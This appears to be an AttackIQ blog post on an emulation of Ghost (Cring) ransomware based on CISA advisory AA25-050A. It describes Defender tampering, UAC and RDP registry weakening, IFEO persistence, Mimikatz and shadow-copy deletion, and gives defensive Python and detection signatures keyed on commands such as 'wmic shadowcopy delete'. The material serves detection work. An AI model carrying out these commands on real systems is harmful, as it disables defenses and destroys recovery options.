On February 19, 2025, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA) to disseminate known Ghost ransomware Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through FBI investigations as recently as January 2025.
This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence needed to combat different ransomware variants and ransomware threat actors.
Ghost, also known as Cring, is a ransomware strain that has been conducting attacks against publicly facing services found to be running outdated software and firmware versions since early 2021.
Based in China, its operators employ publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet-facing servers. They exploit well-known vulnerabilities and target networks where available patches have not been applied.
Its indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small to medium-sized businesses.
Ghost operators rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time.
AttackIQ has released a new attack graph composed of several Tactics, Techniques and Procedures (TTPs) exhibited by Ghost ransomware during its most recent activities, with the aim of helping customers validate their security controls and their ability to defend against this sophisticated and recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against the behaviors exhibited by a threat that conducts worldwide ransomware activities.
- Assess their security posture against activities focused on both exfiltration and encryption of sensitive information.
- Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.
[CISA AA25-050A] #StopRansomware: Ghost (Cring) Ransomware
This attack graph emulates several Tactics, Techniques and Procedures (TTPs) exhibited by Ghost ransomware during its most recent activities.
This emulation is based on the Cybersecurity Advisory (CSA) released by CISA on February 19, 2025, and supported by a report published by Trend Micro on September 24, 2021.
Execution & Privilege Escalation – Impersonate Logged-On User
This stage begins with the execution of an encoded PowerShell command used to deploy Cobalt Strike Beacon. Subsequently, a local account is created to establish persistence in the compromised environment.
Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.
Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Create Account: Local Account (T1136.001): This scenario executes the net user native command to create a new local account.
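The first scenario above relies on PowerShell's -encodedCommand parameter, which carries the script as base64 over UTF-16LE text. A reviewer looking at process-creation telemetry needs to reverse that step to see what actually ran. The following Python is an added example written for this page, not AttackIQ's scenario code; the command line it decodes is a constructed, harmless sample, and the list of flag spellings it recognises is an assumption (powershell.exe accepts several abbreviations of -EncodedCommand, and only the common ones are listed).

```python
import base64
import binascii
import re
from typing import Dict, Optional

# Constructed sample: a harmless script encoded the way the scenario describes
# (UTF-16LE text, base64, passed through -EncodedCommand). Not from the advisory.
SAMPLE_SCRIPT = 'Write-Output "constructed sample, not from the advisory"'
SAMPLE_COMMAND_LINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Assumption: these are the abbreviations of -EncodedCommand most often seen in
# telemetry; powershell.exe accepts other unambiguous prefixes as well.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|encodedc|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
# -WindowStyle Hidden (or the -w abbreviation) is the "Hidden" token that the
# detection signature later on this page keys on.
HIDDEN_FLAG = re.compile(r"-(?:windowstyle|w)\s+hidden", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script carried by -EncodedCommand, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        # PowerShell expects UTF-16LE; an odd byte count means the payload
        # was truncated in the log or is not really an encoded command.
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_powershell(cmdline: str) -> Dict[str, object]:
    """Summarise the launch options a reviewer cares about for one command line."""
    return {
        "encoded": ENCODED_FLAG.search(cmdline) is not None,
        "hidden_window": HIDDEN_FLAG.search(cmdline) is not None,
        "script": decode_encoded_command(cmdline),
    }


if __name__ == "__main__":
    print(triage_powershell(SAMPLE_COMMAND_LINE))
```

Feed `triage_powershell` the CommandLine field of a process-creation event (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled); the decoded script is what should be reviewed and, where appropriate, matched against the download signatures discussed later in this post.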
Defense Evasion & Lateral Movement – Disable Microsoft Defender
This stage begins by obtaining process information through Windows Management Instrumentation (WMI) and continues with the modification of Microsoft Defender settings in order to disable it and avoid detection. Subsequently, the Mimikatz tool is employed to gather system credentials that can potentially be used to perform lateral movement to a remote system.
Windows Management Instrumentation (WMI) (T1047): This scenario obtains process information by executing the Win32_Process WMI command.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableRealtimeMonitoring setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableBehaviorMonitoring setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the DisableIOAVProtection setting in Microsoft Defender.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Set-MpPreference PowerShell cmdlet to modify the MAPSReporting setting in Microsoft Defender.
OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.
Persistence & Defense Evasion – Set Image File Execution Options (IFEO) and Disable Security Features
This stage begins with the deployment of a support batch (BAT) file designed to bypass User Account Control (UAC) by modifying the EnableLUA registry value.
Next, Image File Execution Options (IFEO) are configured to establish persistence, ensuring continued execution. The stage concludes with registry modifications to enhance remote accessibility and maintain control over the target system by enabling remote desktop connections, enabling unsolicited remote assistance, enabling negotiation security layer authentication and disabling Network Layer Authentication (NLA).
Bypass User Account Control (T1548.002): This scenario attempts to bypass UAC by modifying the EnableLUA registry value under the HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System registry key.
Event Triggered Execution: Image File Execution Options Injection (T1546.012): This scenario sets Image File Execution Options (IFEO) through registry modifications under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ of a specific process.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDenyTSConnections to 0 which will enable remote access to the system using Remote Desktop.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fAllowUnsolicited to 1 which will enable unsolicited remote assistance for remote desktop connections to the system.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry value HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\UserAuthentication to 0, which will disable Network Level Authentication (NLA) for remote desktop connections to the host.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario sets the registry value HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\SecurityLayer to 1, which selects the negotiation security layer for remote desktop connections to the host.
Impact – Ghost Ransomware Deployment
This stage begins with the deployment of Ghost ransomware, followed by the execution of a support BAT script designed to disable security controls, clear Windows Event Logs, and delete volume shadow copies using a Windows Management Instrumentation Command (WMIC).
Finally, system file encryption is performed using an algorithm similar to that employed by Ghost ransomware, combining AES-256 and RSA-4096.
Inhibit System Recovery (T1490): This scenario executes the wmic shadowcopy delete command to delete a recent Volume Shadow Copy created by the emulation.
Data Encrypted for Impact (T1486): This scenario simulates the file encryption routine used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithms observed during this activity.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory:
- GodPotato is a privilege escalation tool that exploits Windows Distributed Component Object Model (DCOM) services to obtain SYSTEM privileges. Associated existing scenarios:
  - Download 2023-04 GodPotato v1.20 Sample to Memory
  - Save 2023-04 GodPotato v1.20 to File System
- SharpShares is a .NET-based reconnaissance tool used to enumerate Server Message Block (SMB) network shares within a Windows environment. Associated existing scenarios:
  - Download 2021-08 SharpShares v2.4 Sample to Memory
  - Save 2021-08 SharpShares v2.4 to File System
- Access Token Manipulation: This scenario lists and duplicates the access tokens of the running processes available on the target system in order to escalate privileges. It allows the execution of arbitrary commands by impersonating a logged-in user.
- Lateral Movement Through WMI: This scenario attempts to move laterally to any available asset inside the network through the use of WMI. If the remote asset can be accessed, a configurable command is executed.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations to adapt them to your environment first to determine if you have any existing impact before reviewing the assessment results.
2. Ingress Tool Transfer (T1105):
Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.
2a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
3. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
3a. Detection
Deletion of Volume Shadow Copies is usually the first step that occurs, and it can be detected by looking at command line activity.
Process Name == (cmd.exe OR powershell.exe OR wmic.exe)
Command Line CONTAINS ("wmic" AND "shadowcopy" AND "delete")
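The two pseudo-signatures above, the Set-MpPreference scenarios in the Defense Evasion stage, and the registry modifications in the Persistence stage (EnableLUA, the Terminal Services policy values, and Image File Execution Options) all reduce to simple field matches over process-creation and registry-value-set events. The Python below is an added example written for this post, not AttackIQ or CISA detection content: it runs those rules over a handful of constructed events in the rough shape of Sysmon Event ID 1 (process create) and Event ID 13 (registry value set). The event records, the process name `example.exe` under IFEO, and the `example.invalid` host are all made up for the sample; the field names are a simplified stand-in for real Sysmon output, and the `Debugger` value is the IFEO value most commonly associated with T1546.012.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (simplified Sysmon-like shape). Not real logs.
EVENTS: List[Dict[str, str]] = [
    {"id": "1", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -Command "$w = New-Object Net.WebClient; '
                '$w.DownloadData(\'http://example.invalid/s2\'); Invoke-WebRequest http://example.invalid/b"'},
    {"id": "2", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"id": "3", "type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"id": "4", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"id": "5", "type": "registry",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "details": "DWORD (0x00000000)"},
    {"id": "6", "type": "registry",
     "target": r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\UserAuthentication",
     "details": "DWORD (0x00000000)"},
    {"id": "7", "type": "registry",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\example.exe\Debugger",
     "details": r"C:\constructed\example-debugger.exe"},
    {"id": "8", "type": "registry",   # 1 here disables RDP by policy: not a weakening
     "target": r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\fDenyTSConnections",
     "details": "DWORD (0x00000001)"},
]

# Registry value name (as a lower-cased path suffix) -> (weakened value, technique, description)
WEAKENING_VALUES = {
    "\\policies\\system\\enablelua": (0, "T1548.002", "UAC disabled via EnableLUA"),
    "\\terminal services\\fdenytsconnections": (0, "T1562.001", "RDP enabled via policy"),
    "\\terminal services\\fallowunsolicited": (1, "T1562.001", "unsolicited remote assistance enabled"),
    "\\terminal services\\userauthentication": (0, "T1562.001", "NLA disabled for RDP"),
}

Finding = Tuple[str, str, str]  # (event id, technique id, description)


def _image_name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def _contains_all(text: str, *needles: str) -> bool:
    low = text.lower()
    return all(n.lower() in low for n in needles)


def _contains_any(text: str, *needles: str) -> bool:
    low = text.lower()
    return any(n.lower() in low for n in needles)


def _dword(details: str):
    """Parse the 'DWORD (0x........)' form Sysmon uses for REG_DWORD values."""
    m = re.search(r"DWORD \(0x([0-9A-Fa-f]{8})\)", details)
    return int(m.group(1), 16) if m else None


def match_process(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    name, cl = _image_name(ev["image"]), ev["cmdline"]
    hits = []
    # Page signature: (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden
    if name in {"cmd.exe", "powershell.exe"} and _contains_any(cl, "iwr", "invoke-webrequest") \
            and _contains_all(cl, "downloaddata", "hidden"):
        hits.append(("T1105", "PowerShell download with hidden window"))
    # Page signature: wmic AND shadowcopy AND delete
    if name in {"cmd.exe", "powershell.exe", "wmic.exe"} and _contains_all(cl, "wmic", "shadowcopy", "delete"):
        hits.append(("T1490", "Volume Shadow Copy deletion via WMIC"))
    # The four Set-MpPreference settings named in the Defense Evasion stage
    if _contains_all(cl, "set-mppreference") and _contains_any(
            cl, "disablerealtimemonitoring", "disablebehaviormonitoring", "disableioavprotection", "mapsreporting"):
        hits.append(("T1562.001", "Microsoft Defender preference tampering"))
    return hits


def match_registry(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    target, value = ev["target"].lower(), _dword(ev["details"])
    hits = [(tech, desc) for suffix, (bad, tech, desc) in WEAKENING_VALUES.items()
            if target.endswith(suffix) and value == bad]
    if "\\image file execution options\\" in target and target.endswith("\\debugger"):
        hits.append(("T1546.012", "IFEO Debugger value set"))
    return hits


def run_rules(events: List[Dict[str, str]]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        hits = match_process(ev) if ev["type"] == "process" else match_registry(ev)
        findings.extend((ev["id"], tech, desc) for tech, desc in hits)
    return findings


if __name__ == "__main__":
    for event_id, tech, desc in run_rules(EVENTS):
        print(f"event {event_id}: {tech} {desc}")
```

The registry rules compare against the specific weakened values the scenarios set, so a policy that disables RDP (fDenyTSConnections = 1) is not flagged; when porting this to a SIEM, keep that asymmetry, since the interesting signal is the transition to the permissive value, not any write to the key.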
3b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the recent activities carried out by Ghost ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a widely distributed and dangerous threat.
AttackIQ®, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.